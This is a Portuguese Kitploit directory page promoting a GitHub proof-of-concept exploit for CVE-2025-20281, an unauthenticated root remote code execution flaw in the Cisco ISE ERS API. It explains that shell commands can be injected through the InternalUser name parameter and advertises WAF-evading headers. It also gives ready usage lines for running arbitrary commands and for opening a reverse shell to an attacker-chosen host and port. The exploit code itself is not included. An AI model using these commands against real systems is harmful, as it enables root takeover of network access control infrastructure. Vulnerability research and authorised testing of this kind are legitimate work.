Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Cisco-CVE-2025-20281-illdeed — Exploit de execução remota de código não autenticada para CVE-2025-20281 no Cisco ISE ERS API. Execute comandos ou lance shells reversas como root — nenhuma autenticação é necessária. | Kitploit
Ferramentas/GitHubGitHub/ill-deed/cisco-cve-2025-20281-illdeed
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e EducaçãoRed Teaming
GitHubill-deed/cisco-cve-2025-20281-illdeed

Cisco-CVE-2025-20281-illdeed

Exploit de execução remota de código não autenticada para CVE-2025-20281 no Cisco ISE ERS API. Execute comandos ou lance shells reversas como root — nenhuma autenticação é necessária.

Ver Repositório
5234há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2025-20281 — Exploit de RCE não autenticado na API ERS do Cisco ISE

Este repositório contém um exploit de prova de conceito em Python 3 para CVE-2025-20281, uma vulnerabilidade crítica no Cisco Identity Services Engine (ISE) que permite execução remota de código (RCE) não autenticada como root por meio da API ERS.


🩻 Visão geral da vulnerabilidade

O endpoint /ers/sdk#_ da API ERS do Cisco ISE falha ao validar a autenticação ao processar solicitações de criação de usuários.
Ao injetar comandos de shell no parâmetro name do objeto InternalUser, os atacantes podem obter execução de comandos como root.

  • ID do CVE: CVE-2025-20281
  • Afetados: Cisco ISE PAN (Policy Admin Node) com ERS habilitado
  • Gravidade: Crítica (CVSS 9.8)
  • Autenticação: Nenhuma necessária

⚙️ Recursos

  • ✅ Executar comandos arbitrários (--cmd)
  • ✅ Teste rápido com --whoami
  • ✅ Iniciar shells reversos (--reverse)
  • ✅ Nenhuma autenticação ou token de sessão necessário
  • ✅ Supressão de avisos SSL e saída limpa
  • ✅ Cabeçalhos legítimos para contornar WAFs simples

🚀 Uso

root@kitploit:~
python3 CVE-2025-20281.py TARGET [--whoami | --cmd "id" | --reverse LHOST LPORT]

Exemplos

Comando de teste:

root@kitploit:~
python3 CVE-2025-20281.py 192.168.1.10 --whoami

Executar comando personalizado:

root@kitploit:~
python3 CVE-2025-20281.py 192.168.1.10 --cmd "id && hostname"

Shell reverso:

root@kitploit:~
python3 CVE-2025-20281.py 192.168.1.10 --reverse 10.10.14.99 4444

⚠️ Aviso Legal

Este código é fornecido apenas para fins educacionais e de testes autorizados. Não use este software contra redes ou sistemas que você não possui ou para os quais não tem permissão para testar.


🙏 Créditos

Vulnerabilidade: Divulgada por meio do advisory da Cisco

Refatoração do PoC: illdeed

Baixar ferramenta